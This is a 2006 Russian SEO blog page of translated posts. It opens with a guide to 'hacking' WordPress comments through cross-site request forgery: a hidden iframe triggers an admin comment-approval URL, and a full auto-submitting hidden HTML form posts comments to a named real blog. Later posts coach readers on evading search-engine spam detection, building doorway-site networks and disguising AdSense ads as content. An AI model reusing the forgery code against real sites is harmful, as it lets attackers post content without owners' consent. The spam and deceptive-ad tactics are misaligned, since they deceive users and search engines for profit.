Thursday, December 14, 2006

Как взломать комментарии в WordPress

*Примечание: Этот текст можно использовать только для ознакомления и последующей защиты своего блога. По материалам ВанДер Граафа.

Как взломать комментарии в WordPress?
WordPress считается одним из самых защищенных движков, но и он имеет некоторые уязвимости. Я расскажу как с помощью правильной последовательности команд ТВОЙ блог смогут взломать и спокойно добавлять комментарии в без ведома администратора.

1. Найдите блог на движке WordPress где вы хотите поместить комментарий, но модератор вам этого никогда не позволит.

2. Создайте страничку, содержащую некоторую информацию, но с очень маленьким iframe. Оставьте пустым URL для iframe.

3. Найдите где расположен wp-login.php. Обычно он располагается в той же директории что и блог.

4. Введите комментарий, который вы хотите добавить, но не нажимайте кнопку Submit. Посмотрите в тексте страницы id последнего коментария: <li class=”" id=”comment-7″>. Твой комментарий будет содержать следующее значение (в нашем случае 7+1=8). И посмотрите номер post id <div class=”post” id=”post-10″> (в нашем случае 10).

5. Теперь отредактируйте страницу вместе с iframe и установите iframe на:http://(blog directory)/wp-admin/post.php?action=mailapprovecomment&p=10&comment=8

6. Напишите первый комент и потом можно писать коменты с завлекательной ссылкой на ваш блог вместе со скрытыми iframeмами. Ты также можешь ссылку на свою страницу в первом коменте без добавления второго.

7. Прикрой свою задницу удалением iframe.

8. Сделал!? Теперь вступает в дело модератор! (9 и 10 шаги можешь пропустить они слишком эзотерические)

9. Модератор смотрит по своим логам из контрольной панели и начинает резать Твои комментарии.

10. Он смотрит Твои комментарии, как добавленные свои и подсознательно связывает их со своими и одобряет их. Или нет…:)

11. Хочешь добавлять комментарии без ведома модератора?

12. Смотри исходники формы комментария. Найди там action=”". Скопируй URL и посмотри comment_post_ID.

13. Помести этот код на страницу, которую запрашиваешь через iframe.

<HTML>
<BODY>
<form name='f' method='post' action='http://www.mattcutts.com/blog/wp-comments-post.php' style="display:none;"><!-- enter the url -->
<textarea name="comment">ХАХАХАХА</textarea><!-- enter your message -->
<input name="submit" type="text" value="Submit Comment" />
<input type="hidden" name="comment_post_ID" value="215" /><!-- enter the right number -->
<input name='s' type='submit' value='submit' />
</form>
<script>
document.f.s.click();
</script>
</BODY>
</HTML>

Как видишь крякнуть очень легко. Вот и думай теперь что делать со своим блогом и как его защитить от взлома! Хотя почему то мне кажется у Тебя появились другие мысли.

ЗЫ: Что делать? Ответ будет в другом выпуске. )

Posted by Victor Supryatkin at 1:02 PM 5 comments

Labels:

Автоматическое vs Ручное определение спама

Поисковые системы используют все возможные методы обнаружения спама в своих алгоритмах. Но есть очень много ситуаций, когда используются люди для анализа сайтов (Google quality guidelines).

Так почему поисковики используют ручное распознование спама???

Необходимость ресурсов
Алгоритмы поисковиков становятся все более и более совершенными и они могут определить все что угодно. Только нужно учесть - сколько займет это ресурсов!!!

Поэтому, в тех случаях, когда необходима постоянная проверка используют автоматические ресурсы, а в других случаях прибегают к ручной оценке спама.


Ручное вмешательство
Другая проблема у поисковика: "Как идентифицировать спам?" Какойто текс скрывается, потому что кто то хочет обмануть поисковик? Некоторые случаи могут быть выявлены с помощью алгоритмов, но обычно необходимо принять решение. И его принимает человек. Поисковики делают все возможное в соответствии с заданными алгоритмами, а уже люди учат их как распознавать спам. Но все равно решение принимает человек.

Процесс рассморения

Приведу основную градацию запрещенных активностей по версии Google:
1. Не спам, легальный контент и активность;
2. Возможно спам. Обнаружен, но невозможно определить автоматически (навешивается оранжевый или красный флаг, небольшое уменьшение в ранжировании);
3. Определен легкий спам-контент. Определяется алгоритмом. (небольшое снижение PR)
4. Определен тяжелый спам. Помечается флагом и просматривется вручную (удаляется из индекса)
5. Возможный спам из-за внешних факторов. Находится, но невозможно определить алгоритмически.
6. Определен легкий спам-контент из-за внешних факторов. Определяется алгоритмически (помечается красным флагом)
7. Определен тяжелый спам-контент. Помечается и проверяется человеком(сайт удаляется из индекса)

Флаги сами по себе не несут на себе эффекта на PR, но с увеличением количества красных флагов для сайта упрощают дальнейшее их рассмотрение. Когда необходимо человеческое вмешательство, то Твои сайты (да именно сайтЫ) будут просмотрены и возможно все забанены. Если ты уже "прославился", то у Тебя очень большой шанс быть забаненным навсегда. Тебя спасет, только придумывание нового алгоритма - а я скрещу за тебя пальцы. ))

Используй знания для своего преимущества.

Для определения техники спама всегда необходим простой просмотр статистики загрузки сервера. Поисковики не любят тратить ресурсы впустую, поэтому ты должен избегать этого. Не бери на себя много красных флагов, потому что можешь получить статус серьезного спамера и получить запрос на рассмотрение твоего сайта человеком. Люди довольно дорогой ресурс и поисковики отправляют на рассмотрение только при 100% уверенности в спаме или обнаружении новой техники спама.

Однажды Ты будешь помечен как НЕВЬЕБЕННЫЙ спаммер. Ты можешь гордиться собой и продолжать в том же духе. А можешь сменить направление деятельности - убрать все ссылки между сайтами определенными как спам и обычными. И они закроют глаза на Тебя!

Успеха в Твоем нелегком деле!
Скажу спасибо Ван Дер Граафу за материал.

Posted by Victor Supryatkin at 11:12 AM 2 comments

Wednesday, December 13, 2006

4 стратегии для увеличения CTR

От переводчика:
Эта статья не претендует на небольшой учебник как создать большое количество сайтов, как получить нужный трафик с поисковиков. 
Эта статья является рекламой Brada Callena и его софта Keyword Elite. )


AdSense не является единственным путем заработать деньги, но определенно это один из легких путей - все что нужно - настроить Твою рекламу, разместить на сайте и откинуться на спинку стула "попивая сок в своем квартале"

Но к сожалению, не нужно забывать что сделать сайт и зарабатывать деньги с AdSense это две разные вещи.

Для заработка с AdSense Тебе необходимо:

  1. Посетители.
  2. МНОГО посетителей и кликов на Твоей реклами (реклама привлекающая клики увеличивает твой CTR)
  3. Высокая оплата с клика (прибыльные кейворды)

Как привлечь посетителя? Как заинтересовать его? Как уговорить его кликнуть на рекламу? Посетители с поисковиков ищут конкретную информацию на осязаемую тему - ты даешь им эту информацию? Твоя Реклама?

С другой стороны - "это реклама - реклама это плохо" - психологический барьер. Наше общество, интернет постоянно засирается тоннами реклама и это довольно серьезное сопротивление для пользователя. Я покажу Тебе как можно обойти это…просто продолжай читать. )

Привлечение Внимания

Многие люди думают, что лучший способ привлечь внимание это ЯРКИЕ цвета и естественно реклама выделяется на общем фоне. Это хорошая идея - в теории. Но давайте подумаем, что же происходит в реальном мире. В первое время, ты видишь яркую, ослепительную рекламу, она отвлекает Тебя. При повторном просмотре рекламы она отвлекает меньше, хотя Ты все еще смотришь на нее.

И с пятого разы ты полностью игнорируешь яркую рекламу и полностью фокусируешь на своем деле. Это назвается - "рекламная слепота" - человеческий мозг закрывается от рекламы и это не дает им то что они хотят. Аналогичный эффект может наблюдаться и в обычной обстановке и называется - отрицательная галлюцинация

Во-первых, Ты имеешь, то что хотят читатели.
Во-вторых, удостоверься, реклама совпадает с запросами.

Тематическая реклама

Что хотят читатели? Что они ищут? Твой сайт предоставляет нужную информацию? Так добавь соответствую рекламу в статьи и пользователи будут кликать по ней только лишь потому, что она имеет схожую тематику

Реакция людей на рекламу
Как можно обойти реакцию людей на рекламные блоки?
Внедрением их в информацию. Простой пример, AdSense блок должен быть меньше похож на рекламу и больше на Твой текст. Когда юзер зайдет на сайт в поисках информации, то Твоя цель - это чтобы реклама была максимально похожа на информацию

Целевая реклама

AdSense использует совпадения слов для размещения на Твоем сайте. Поэтому важно писать статьи ориентированные на ключевые слова. Если реклама не будет соответствовать теме сайта и она только отвлечет посетителя от просмотра. Будь уверен, что каждая страница сайта фокусируется на единственной ключевой фразе - используй это ключевое слово везде в своей статье, во всех возможных областях (title tag, header tag). Ограничивая фокус пользователя на конкретном топике, позволяет не только писать оригинальный контент для определенных слов, но и поддерживать иллюзию беседы с другим человеком.

Доступные форматы рекламы

Некоторые форматы AdSense приносят больше кликов чем другие:

High CTR Ad Formats:
336 x 280 (large rectangle)
300 x 250 (rectangle)
250 x 250 (square)

Причина, по которой эти форматы приносят больше кликов, в том что они схожи с написанными текстами. Поэтому помещайте их в наиболее видим местах своего сайта.

Low CTR Ad Formats:
468 x 60 (banner ad)
160 x 600 (wide skyscraper)
120 x 600 (skyscraper)

Эти баннеры обычно никогда не работают - формат их совпадает с форматом традиционной рекламы и поэтому они игнорируются. С другой стороны, "рекламные небоскребы" можно использовать с боковых сторон (где обычно находится навигация), в стороне от центра страницы с главным контентом.
Единственное место когда эти баннеры работали - так это внизу страницы, но в этом случае CRN было так мало, что лучше воздержаться от комментариев.
Остерегайтесь форматов рекламы для низкого CRN и размещайте только блоки с высоким CRT. По факту, используйте 336 х 280 прямоугольный формат там где это возможно. Оставшиеся два формата лучше использовать в ограниченном пространстве.



Оптимальное размещение рекламы
Правильная позиция рекламы привлечет читателей к нем и как результат это даст хороший CRT эффект. Хочешь добиться максимального - помещай рекламу в центр страницы. Конечно, можно показать только часть текста, с другой стороны ты только оттолкнешь читателей и они закроют страницы, вместо того чтобы кликнуть в нужном месте.

Покажу два места для размещения рекламы внутри контента.
Первый: Размести прямоугольник над контентом, но под заголовком.
-----
<>Заголовок<>
336 x 280 rectangle adblock
Остальной контент
-----

Второй:
Можно поместить рекламу внутри контента (справа или слева) и дать обтекать тексту вокруг нее. Я предпочитаю, второй вариант, он позволяет помещать рекламу в важные места. Но иногда первый способ дает тоже хорошие результаты.

Комбинация цветов

В основном, маскируй рекламу под цвет своего контента. К примеру, если бэкграунд у сайта белый значит и границы рекламного блока тоже должны быть белыми. Если серый - сделай их серыми…и т.д. Цвет ссылок в рекламе должен быть таким же как цвет ссылок на сайте.

Давайте подумаем вот о чем - цвет обычных ссылок и цвет рекламных ссылок.

Обычно, для ссылок используют синий цвет, вне зависимости от цветовой схемы сайта, потому что люди подсознательно понимают - синий подчеркнутый текст является ссылкой. Добавьте сюда факт - с поисковиков заходят люди любящие кликать по линкам, это значит что они не хотят входить в Ваш вкус с разными цветами линков. Для них, синий цвет наиболее информативен и направлен на получении информации.

Для рекламных ссылок, просто соблюдайте правило - рекламное объявление не должно "выпадать" со страницы. Не нужно использовать резко контрастирующих цветов между фонам объявления и сайта.
Все это делает схожесть у рекламы с обычным текстом, а не с рекламой. Для контраста попробуй добавить классический баннер вверху страницы.

Прибыльные слова

Получение много трафика и конвертирование это трафика в клики на рекламу как только возможно - это даст лучший результат. Но если сайт базируется на низкочастотниках, вам придется приложить массу усилий для привлечения и оптимизации вашего сайта для ПУСТОТЫ. )

Попробуйте создавать сайты вокруг ниш, за которые рекламодателе согласны платить много денег - этот путь даст понять все тонкости использования вышеприведенных техник.

Как же получить прибыльные слова?

Слова можно покупать с сайтов вроде AdSense Heaven

Можно искать самостоятельно используя Overture keyword selector, а для оценки стоимости слова использовать Keyword Elite.

Пункт 1 будет стоит много денег, если ты будешь строить несколько AdSense сайтов. При построении Дорвей Империи действует закон больших чисел. Ты должен будешь создавать сотни маленьких сайтов которые будут приносить трафик на один большой сайт - кстати, основные затраты будут на создание сайта, они редко требую поддержки и могут работать на автопилоте годами.

Пункт 2, с другой стороны - тебе нужно много времени на поиск ключевых слов, это очень важный шаг для привлечения трафика

Пункт 3 - или, можно использовать Keyword Elite, и сэкономить первый и второй шаг - время и деньги.

Конец

 

Posted by Victor Supryatkin at 2:40 PM 2 comments

Tuesday, December 12, 2006

Link Love - Любимые ссылки???

«Избранные ссылки» (в забугорье их еще называют LinkLove), наверно, лучшее слово для описания линков на другие сайты. Ты можешь принимать их или отдавать. Но будь осторожен – следи за своими связями. Да, и еще чтобы что то отдать нужно что то дать!

«All you need is love» - так пели Битлы, еще в 1967 году: «Love is all you need …”. Избранные линки помогут увеличить рейтинги. Почему? Очень просто. Люди заходят на Твой сайт – им он может нравиться, может не нравиться. Важно другое – захотят ли они еще раз зайти на Твой сайт. Возможно захотят, а тут недалеко и до размещения Твоих линков у них на сайте. Пусть они говорят о Твоем сайте на форумах, блогах, хранилищах букмарков или просто между людьми.

Как сделать так, чтобы люди полюбили Твой сайт? Это не просто сделать хороший сайт! Начни с того, что люди ВНЕЗАПНО узнают о Твоем потрясающем сайте. Пусть они сами раскручивают Твой сайт, как говориться чем дальше в лес тем больше трафик. Благодари своих лучших промоутеров и друзей, общайся с ними, дари им свои комменты.

Мой SEO Tip на день: Пусть любой захочет ссылку на Твоем сайте. Только предохраняйся. )



 

Posted by Victor Supryatkin at 3:36 PM 0 comments

Начнем?! :)

Здесь буду публиковать переводы статей на тему SEO. Все кто заинтересован - 
you are welcome!  :) Через некоторое время выложу расписание публикования статей, а Вы, уважаемые читатели, :) сможете даже повлиять на приоритетность перевода некоторых статей. :)
Успеха, Виктор.

Posted by Victor Supryatkin at 11:49 AM 0 comments

Subscribe to: Posts (Atom)